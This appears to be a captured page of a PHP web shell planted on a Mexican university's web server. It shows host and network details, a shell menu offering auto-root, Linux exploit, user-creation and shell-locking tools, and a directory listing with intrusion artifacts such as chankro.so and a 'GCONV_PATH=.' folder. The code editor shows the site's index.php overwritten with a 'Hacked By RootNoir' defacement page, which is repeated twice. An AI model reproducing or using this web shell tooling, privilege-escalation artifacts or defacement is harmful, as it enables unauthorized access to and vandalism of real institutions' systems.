Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
webalizer /
[ HOME SHELL ]
Name
Size
Permission
Action
about
[ DIR ]
drwxrwxr-x
asm
[ DIR ]
drwxr-xr-x
becas
[ DIR ]
drwxr-xr-x
cache
[ DIR ]
drwxr-xr-x
carousel
[ DIR ]
drwxr-xr-x
carpeta
[ DIR ]
drwxr-xr-x
ccs_2025
[ DIR ]
drwxr-xr-x
contraloria
[ DIR ]
drwxr-xr-x
contraloriares
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
dekode
[ DIR ]
drwxrwxr-x
documentos
[ DIR ]
drwxr-xr-x
domianos
[ DIR ]
drwxrwxr-x
GCONV_PATH=.
[ DIR ]
drwxrwxr-x
html3
[ DIR ]
drwxrwxr-x
inscripciones.aspx
[ DIR ]
drwxr-xr-x
jkt-pobox
[ DIR ]
drwxrwxr-x
mindfulness
[ DIR ]
drwxrwxr-x
promocion
[ DIR ]
drwxr-xr-x
Sbdfabk
[ DIR ]
drwxrwxr-x
sym404
[ DIR ]
drwxr-xr-x
tes
[ DIR ]
drwxrwxr-x
url
[ DIR ]
drwxrwxr-x
.htaccess
230
B
-rw-r--r--
acpid.socket
103
B
-rwxrwxrwx
auth.php
380
B
-rw-rw-r--
chankro.so
8.3
KB
-rw-rw-r--
cookies.php
215.33
KB
-rw-r--r--
defunct
2.7
MB
-rwx------
defunct.dat
23
B
-rw-------
google152d10ec11b28677.html
53
B
-rw-rw-r--
google52306c35488e1358.html
53
B
-rw-r--r--
index.php
13.15
KB
-rw-rw-r--
ipv4.php
1.78
KB
-rw-rw-r--
legal.php
1.56
KB
-rw-r--r--
logs.php
1.72
KB
-rw-r--r--
menu.php
6.65
KB
-rw-rw-r--
path.PHP
3.06
KB
-rw-rw-r--
public2.php
21.79
KB
-rw-r--r--
sitemap.xml
500
B
-rw-rw-r--
spxmailer.php
4.75
KB
-rw-rw-r--
support.php
31
B
-rwxrwxrwx
surender.php
68
KB
-rw-r--r--
tecnologias_perfil.php
3
B
-rw-rw-r--
test.txt
0
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<!DOCTYPE html> <html lang="id"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Hacked By RootNoir</title> <meta name="description" content="RootNoir | Hacker Demo Page Indonesia"> <meta property="og:title" content="Hacked By RootNoir"> <meta property="og:description" content="RootNoir - Hacker Demo Page Indonesia"> <meta property="og:image" content="https://joki55dricet.pages.dev/1ac6796f-0686-4277-810b-3d3c2be434cb.png"> <meta property="og:type" content="website"> <meta name="theme-color" content="#ff0000"> <link rel="icon" href="https://joki55dricet.pages.dev/1ac6796f-0686-4277-810b-3d3c2be434cb.png" type="image/png"> <style> body { margin: 0; padding: 0; background: #000; font-family: 'Courier New', monospace; color: #fff; height: 100vh; overflow: hidden; } /* 🔹 Partikel bintang merah */ .particle { position: fixed; top: 0; left: 0; width: 100%; height: 100%; pointer-events: none; z-index: 0; overflow: hidden; } .dot { position: absolute; width: 3px; height: 3px; border-radius: 50%; background: #ff0000; box-shadow: 0 0 6px #ff0000; animation: rise 15s linear infinite; } @keyframes rise { 0% { transform: translateY(100vh) scale(0.5); opacity: 0; } 50% { opacity: 1; } 100% { transform: translateY(-10vh) scale(1); opacity: 0; } } .overlay { position: relative; display: flex; flex-direction: column; justify-content: center; align-items: center; height: 100%; text-align: center; z-index: 10; animation: fadein 2s ease; } /* 🔺 Logo RootNoir */ .logo { width: 130px; height: 130px; border-radius: 50%; margin-bottom: 25px; box-shadow: 0 0 25px rgba(255, 0, 0, 0.8); animation: pulse 3s infinite alternate; } @keyframes pulse { 0% { box-shadow: 0 0 10px rgba(255, 0, 0, 0.6); } 100% { box-shadow: 0 0 40px rgba(255, 0, 0, 1); } } h1 { font-size: 3rem; color: #ff4444; text-shadow: 0 0 20px rgba(255,0,0,0.7); animation: glitch 2s infinite; letter-spacing: 2px; z-index: 11; } @keyframes glitch { 0% { text-shadow: 2px 0 red, -2px 0 cyan; } 20% { text-shadow: -2px 0 red, 2px 0 cyan; } 40% { text-shadow: 2px 0 red, -2px 0 cyan; } 60% { text-shadow: -2px 0 red, 2px 0 cyan; } 100% { text-shadow: 2px 0 red, -2px 0 cyan; } } @keyframes fadein { from {opacity:0} to {opacity:1} } p { font-size: 1.1rem; color: #ccc; margin-top: 10px; text-shadow: 0 0 8px rgba(255, 0, 0, 0.4); } .social a { color: #ff4444; margin: 0 10px; text-decoration: none; transition: 0.3s; z-index: 11; position: relative; } .social a:hover { text-shadow: 0 0 10px #ff0000; } button { margin-top: 25px; background: transparent; border: 2px solid #ff4444; color: #ff4444; padding: 10px 20px; font-family: inherit; font-size: 1rem; cursor: pointer; border-radius: 6px; transition: all 0.3s ease; z-index: 11; position: relative; } button:hover { background: #ff4444; color: #000; box-shadow: 0 0 20px #ff0000; } footer { margin-top: 40px; color: #777; font-size: 0.85rem; text-shadow: 0 0 8px rgba(255,0,0,0.4); z-index: 11; position: relative; } #musicIndicator { position: fixed; bottom: 25px; left: 25px; width: 12px; height: 12px; background: #ff0000; border-radius: 50%; box-shadow: 0 0 8px #ff0000; opacity: 0.2; transition: 0.3s; z-index: 11; } .scanline { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: repeating-linear-gradient(0deg, rgba(255,255,255,0.02) 0px, rgba(255,255,255,0.02) 1px, transparent 1px, transparent 3px); pointer-events: none; animation: flicker 1.5s infinite; z-index: 5; } @keyframes flicker { 0%,19%,21%,23%,25%,54%,56%,100% { opacity:0.2; } 20%,24%,55% { opacity:0.35; } } @media(max-width:600px){ h1{ font-size:2rem; } .logo{ width:100px; height:100px; } } </style> </head> <body> <!-- 🔹 Partikel bintang --> <div class="particle" aria-hidden="true"></div> <div class="overlay"> <img src="https://joki55dricet.pages.dev/1ac6796f-0686-4277-810b-3d3c2be434cb.png" alt="RootNoir Logo" class="logo"> <h1>Hacked By RootNoir</h1> <p>"Silence is security. Shadows are freedom."</p> <div class="social"> <a href="https://t.me/@blackroot_zzz" target="_blank">Telegram</a> | <a href="https://github.com/rootnoir" target="_blank">GitHub</a> | <a href="https://x.com/@blackroot_zzz" target="_blank">Twitter</a> </div> <button id="musicBtn">Putar Musik</button> <footer>© 2025 - 2026 RootNoir | All Rights Reserved</footer> </div> <div id="musicIndicator"></div> <div class="scanline"></div> <iframe id="musicFrame" width="0" height="0" frameborder="0" allow="autoplay"></iframe> <script> // 🔹 Buat partikel bintang merah const particleContainer = document.querySelector('.particle'); for(let i=0;i<50;i++){ const dot = document.createElement('div'); dot.className = 'dot'; dot.style.left = Math.random()*100+'%'; dot.style.top = Math.random()*100+'%'; dot.style.animationDuration = (10 + Math.random()*10)+'s'; particleContainer.appendChild(dot); } // 🔹 Musik const btn = document.getElementById('musicBtn'); const iframe = document.getElementById('musicFrame'); const indicator = document.getElementById('musicIndicator'); let playing = false; btn.addEventListener('click', () => { if(!playing){ iframe.src = "https://www.youtube.com/embed/mkkB1EdEjbA?autoplay=1&loop=1&playlist=mkkB1EdEjbA"; btn.textContent = "Hentikan Musik"; indicator.style.opacity = "1"; playing = true; }else{ iframe.src = ""; btn.textContent = "Putar Musik"; indicator.style.opacity = "0.2"; playing = false; } }); </script> </body> </html> <!DOCTYPE html> <html lang="id"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Hacked By RootNoir</title> <meta name="description" content="RootNoir | Hacker Demo Page Indonesia"> <meta property="og:title" content="Hacked By RootNoir"> <meta property="og:description" content="RootNoir - Hacker Demo Page Indonesia"> <meta property="og:image" content="https://joki55dricet.pages.dev/1ac6796f-0686-4277-810b-3d3c2be434cb.png"> <meta property="og:type" content="website"> <meta name="theme-color" content="#ff0000"> <link rel="icon" href="https://joki55dricet.pages.dev/1ac6796f-0686-4277-810b-3d3c2be434cb.png" type="image/png"> <style> body { margin: 0; padding: 0; background: #000; font-family: 'Courier New', monospace; color: #fff; height: 100vh; overflow: hidden; } /* 🔹 Partikel bintang merah */ .particle { position: fixed; top: 0; left: 0; width: 100%; height: 100%; pointer-events: none; z-index: 0; overflow: hidden; } .dot { position: absolute; width: 3px; height: 3px; border-radius: 50%; background: #ff0000; box-shadow: 0 0 6px #ff0000; animation: rise 15s linear infinite; } @keyframes rise { 0% { transform: translateY(100vh) scale(0.5); opacity: 0; } 50% { opacity: 1; } 100% { transform: translateY(-10vh) scale(1); opacity: 0; } } .overlay { position: relative; display: flex; flex-direction: column; justify-content: center; align-items: center; height: 100%; text-align: center; z-index: 10; animation: fadein 2s ease; } /* 🔺 Logo RootNoir */ .logo { width: 130px; height: 130px; border-radius: 50%; margin-bottom: 25px; box-shadow: 0 0 25px rgba(255, 0, 0, 0.8); animation: pulse 3s infinite alternate; } @keyframes pulse { 0% { box-shadow: 0 0 10px rgba(255, 0, 0, 0.6); } 100% { box-shadow: 0 0 40px rgba(255, 0, 0, 1); } } h1 { font-size: 3rem; color: #ff4444; text-shadow: 0 0 20px rgba(255,0,0,0.7); animation: glitch 2s infinite; letter-spacing: 2px; z-index: 11; } @keyframes glitch { 0% { text-shadow: 2px 0 red, -2px 0 cyan; } 20% { text-shadow: -2px 0 red, 2px 0 cyan; } 40% { text-shadow: 2px 0 red, -2px 0 cyan; } 60% { text-shadow: -2px 0 red, 2px 0 cyan; } 100% { text-shadow: 2px 0 red, -2px 0 cyan; } } @keyframes fadein { from {opacity:0} to {opacity:1} } p { font-size: 1.1rem; color: #ccc; margin-top: 10px; text-shadow: 0 0 8px rgba(255, 0, 0, 0.4); } .social a { color: #ff4444; margin: 0 10px; text-decoration: none; transition: 0.3s; z-index: 11; position: relative; } .social a:hover { text-shadow: 0 0 10px #ff0000; } button { margin-top: 25px; background: transparent; border: 2px solid #ff4444; color: #ff4444; padding: 10px 20px; font-family: inherit; font-size: 1rem; cursor: pointer; border-radius: 6px; transition: all 0.3s ease; z-index: 11; position: relative; } button:hover { background: #ff4444; color: #000; box-shadow: 0 0 20px #ff0000; } footer { margin-top: 40px; color: #777; font-size: 0.85rem; text-shadow: 0 0 8px rgba(255,0,0,0.4); z-index: 11; position: relative; } #musicIndicator { position: fixed; bottom: 25px; left: 25px; width: 12px; height: 12px; background: #ff0000; border-radius: 50%; box-shadow: 0 0 8px #ff0000; opacity: 0.2; transition: 0.3s; z-index: 11; } .scanline { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: repeating-linear-gradient(0deg, rgba(255,255,255,0.02) 0px, rgba(255,255,255,0.02) 1px, transparent 1px, transparent 3px); pointer-events: none; animation: flicker 1.5s infinite; z-index: 5; } @keyframes flicker { 0%,19%,21%,23%,25%,54%,56%,100% { opacity:0.2; } 20%,24%,55% { opacity:0.35; } } @media(max-width:600px){ h1{ font-size:2rem; } .logo{ width:100px; height:100px; } } </style> </head> <body> <!-- 🔹 Partikel bintang --> <div class="particle" aria-hidden="true"></div> <div class="overlay"> <img src="https://joki55dricet.pages.dev/1ac6796f-0686-4277-810b-3d3c2be434cb.png" alt="RootNoir Logo" class="logo"> <h1>Hacked By RootNoir</h1> <p>"Silence is security. Shadows are freedom."</p> <div class="social"> <a href="https://t.me/@blackroot_zzz" target="_blank">Telegram</a> | <a href="https://github.com/rootnoir" target="_blank">GitHub</a> | <a href="https://x.com/@blackroot_zzz" target="_blank">Twitter</a> </div> <button id="musicBtn">Putar Musik</button> <footer>© 2025 - 2026 RootNoir | All Rights Reserved</footer> </div> <div id="musicIndicator"></div> <div class="scanline"></div> <iframe id="musicFrame" width="0" height="0" frameborder="0" allow="autoplay"></iframe> <script> // 🔹 Buat partikel bintang merah const particleContainer = document.querySelector('.particle'); for(let i=0;i<50;i++){ const dot = document.createElement('div'); dot.className = 'dot'; dot.style.left = Math.random()*100+'%'; dot.style.top = Math.random()*100+'%'; dot.style.animationDuration = (10 + Math.random()*10)+'s'; particleContainer.appendChild(dot); } // 🔹 Musik const btn = document.getElementById('musicBtn'); const iframe = document.getElementById('musicFrame'); const indicator = document.getElementById('musicIndicator'); let playing = false; btn.addEventListener('click', () => { if(!playing){ iframe.src = "https://www.youtube.com/embed/mkkB1EdEjbA?autoplay=1&loop=1&playlist=mkkB1EdEjbA"; btn.textContent = "Hentikan Musik"; indicator.style.opacity = "1"; playing = true; }else{ iframe.src = ""; btn.textContent = "Putar Musik"; indicator.style.opacity = "0.2"; playing = false; } }); </script> </body> </html>
Close